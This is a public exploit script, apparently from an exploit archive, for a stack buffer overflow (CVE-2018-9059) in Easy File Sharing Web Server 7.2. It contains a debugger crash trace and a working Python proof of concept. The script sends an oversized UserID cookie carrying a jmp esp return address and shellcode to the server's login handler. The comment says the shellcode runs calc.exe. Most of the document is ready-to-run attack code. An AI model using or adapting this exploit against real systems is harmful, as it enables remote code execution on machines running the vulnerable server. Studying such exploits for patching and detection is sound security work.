Easy File Sharing Web Server 7.2 Buffer Overflow

`# Exploit Title: Easy File Sharing Web Server 7.2 stack buffer overflow  
# Date: 03/24/2018  
# Exploit Author: rebeyond - http://www.rebeyond.net  
# Vendor Homepage: http://www.sharing-file.com/  
# Software Link: http://www.sharing-file.com/efssetup.exe  
# Version: 7.2  
# CVE: CVE-2018-9059  
# Tested on: Windows XP Professional SP3  
#  
# Description:  
# Attackers just need to construct a malicious login request packet,and send the packet to the server.The server can be pwned  
#  
#  
# The stack trace is as follows:  
# (40d8.2980): Access violation - code c0000005 (first chance)  
# r  
# eax=41414141 ebx=00000001 ecx=ffffffff edx=08fb62a0 esi=08fb6280 edi=08fb62a0  
# eip=61c277f6 esp=08fb61fc ebp=08fb6214 iopl=0 nv up ei pl nz na pe nc  
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206  
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\EFS Software\Easy File Sharing Web Server\sqlite3.dll -  
# sqlite3!sqlite3_errcode+0x8e:  
# 61c277f6 81784c97a629a0 cmp dword ptr [eax+4Ch],0A029A697h ds:002b:4141418d=????????  
#  
# kb  
# ChildEBP RetAddr Args to Child  
# WARNING: Stack unwind information not available. Following frames may be wrong.  
# 083b6214 61c6286c 00001183 0000115d 085c4d44 sqlite3!sqlite3_errcode+0x8e  
# *** WARNING: Unable to verify checksum for fsws.exe  
# *** ERROR: Module load completed but symbols could not be loaded for fsws.exe  
# 083b6254 004968f4 00000001 00000000 083b6280 sqlite3!sqlite3_declare_vtab+0x3282  
# 083b6274 004975a3 083b6298 00000000 083b75fc fsws+0x968f4  
# 00000000 00000000 00000000 00000000 00000000 fsws+0x975a3  
  
  
import requests  
host='192.168.50.30'  
port='80'  
  
buf='A'*4071  
buf +='\x12\x45\xfa\x7f' #jmp esp  
buf +='A'*12  
buf +='\xeb\x36' #jmp 0x36  
buf +='A'*42  
buf +='\x60\x30\xc7\x61'*2 #must be valid address  
buf +='A'*4  
#shellcode to execute calc.exe on remote server  
buf += "\xdb\xdc\xd9\x74\x24\xf4\x58\xbb\x24\xa7\x26\xec\x33"  
buf += "\xc9\xb1\x31\x31\x58\x18\x03\x58\x18\x83\xe8\xd8\x45"  
buf += "\xd3\x10\xc8\x08\x1c\xe9\x08\x6d\x94\x0c\x39\xad\xc2"  
buf += "\x45\x69\x1d\x80\x08\x85\xd6\xc4\xb8\x1e\x9a\xc0\xcf"  
buf += "\x97\x11\x37\xe1\x28\x09\x0b\x60\xaa\x50\x58\x42\x93"  
buf += "\x9a\xad\x83\xd4\xc7\x5c\xd1\x8d\x8c\xf3\xc6\xba\xd9"  
buf += "\xcf\x6d\xf0\xcc\x57\x91\x40\xee\x76\x04\xdb\xa9\x58"  
buf += "\xa6\x08\xc2\xd0\xb0\x4d\xef\xab\x4b\xa5\x9b\x2d\x9a"  
buf += "\xf4\x64\x81\xe3\x39\x97\xdb\x24\xfd\x48\xae\x5c\xfe"  
buf += "\xf5\xa9\x9a\x7d\x22\x3f\x39\x25\xa1\xe7\xe5\xd4\x66"  
buf += "\x71\x6d\xda\xc3\xf5\x29\xfe\xd2\xda\x41\xfa\x5f\xdd"  
buf += "\x85\x8b\x24\xfa\x01\xd0\xff\x63\x13\xbc\xae\x9c\x43"  
buf += "\x1f\x0e\x39\x0f\x8d\x5b\x30\x52\xdb\x9a\xc6\xe8\xa9"  
buf += "\x9d\xd8\xf2\x9d\xf5\xe9\x79\x72\x81\xf5\xab\x37\x7d"  
buf += "\xbc\xf6\x11\x16\x19\x63\x20\x7b\x9a\x59\x66\x82\x19"  
buf += "\x68\x16\x71\x01\x19\x13\x3d\x85\xf1\x69\x2e\x60\xf6"  
buf += "\xde\x4f\xa1\x95\x81\xc3\x29\x74\x24\x64\xcb\x88"  
  
cookies = dict(SESSIONID='6771', UserID=buf,PassWD='')  
data=dict(frmLogin='',frmUserName='',frmUserPass='',login='')  
requests.post('http://'+host+':'+port+'/forum.ghp',cookies=cookies,data=data)  
  
`